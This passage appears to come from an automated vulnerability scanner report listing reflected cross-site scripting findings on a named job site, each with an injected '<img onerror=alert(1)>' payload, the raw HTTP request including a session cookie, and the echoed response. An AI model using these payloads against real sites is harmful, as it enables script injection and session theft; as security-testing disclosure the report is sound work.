The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595 was submitted in the REST URL parameter 6. This input was echoed as 217ce"><img src=a onerror=alert(1)>e2f23c29595 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/css/views.css217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-css-views.css217ce"><img src=a onerror=alert(1)>e2f23c29595 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.80. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151 was submitted in the REST URL parameter 1. This input was echoed as 55ce2"><img src=a onerror=alert(1)>b6a4460d151 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151/all/modules/views/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites55ce2"><img src=a onerror=alert(1)>b6a4460d151-all-modules-views-js-base.js not-front not-logged-in page-sites55ce2img-srca-onerroralert1b6a4460d151 no-sidebars">
...[SNIP]...

3.81. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f was submitted in the REST URL parameter 2. This input was echoed as b1472"><img src=a onerror=alert(1)>f600b8d8b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allb1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f/modules/views/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:48:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:48:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allb1472"><img src=a onerror=alert(1)>f600b8d8b7f-modules-views-js-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.82. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6 was submitted in the REST URL parameter 3. This input was echoed as db72e"><img src=a onerror=alert(1)>21d9a5a41d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesdb72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6/views/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:49:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:49:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesdb72e"><img src=a onerror=alert(1)>21d9a5a41d6-views-js-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.83. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466 was submitted in the REST URL parameter 4. This input was echoed as 40667"><img src=a onerror=alert(1)>7444b52466 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:50:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:50:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views40667"><img src=a onerror=alert(1)>7444b52466-js-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.84. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c was submitted in the REST URL parameter 5. This input was echoed as 98959"><img src=a onerror=alert(1)>38f529bd14c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/js98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:51:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:51:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-js98959"><img src=a onerror=alert(1)>38f529bd14c-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.85. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a was submitted in the REST URL parameter 6. This input was echoed as 5d277"><img src=a onerror=alert(1)>086dd8d227a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/js/base.js5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:52:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:52:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-js-base.js5d277"><img src=a onerror=alert(1)>086dd8d227a not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.86. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d was submitted in the REST URL parameter 1. This input was echoed as a17d3"><img src=a onerror=alert(1)>d553028ad8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesa17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d/all/modules/views/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesa17d3"><img src=a onerror=alert(1)>d553028ad8d-all-modules-views-js-dependent.js not-front not-logged-in page-sitesa17d3img-srca-onerroralert1d553028ad8d no-sidebars">
...[SNIP]...

3.87. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1 was submitted in the REST URL parameter 2. This input was echoed as e3d6d"><img src=a onerror=alert(1)>f58295307b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/alle3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1/modules/views/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:48:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:48:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-alle3d6d"><img src=a onerror=alert(1)>f58295307b1-modules-views-js-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.88. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38 was submitted in the REST URL parameter 3. This input was echoed as ab624"><img src=a onerror=alert(1)>3f8d84be38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38/views/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:49:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:49:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesab624"><img src=a onerror=alert(1)>3f8d84be38-views-js-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.89. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530 was submitted in the REST URL parameter 4. This input was echoed as 42122"><img src=a onerror=alert(1)>5997e6b530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:50:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:51:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views42122"><img src=a onerror=alert(1)>5997e6b530-js-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.90. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283 was submitted in the REST URL parameter 5. This input was echoed as b518a"><img src=a onerror=alert(1)>ec316c3a283 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/jsb518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:51:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:51:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-jsb518a"><img src=a onerror=alert(1)>ec316c3a283-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.91. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef was submitted in the REST URL parameter 6. This input was echoed as db2bb"><img src=a onerror=alert(1)>d9d6098e8ef in the application's response.

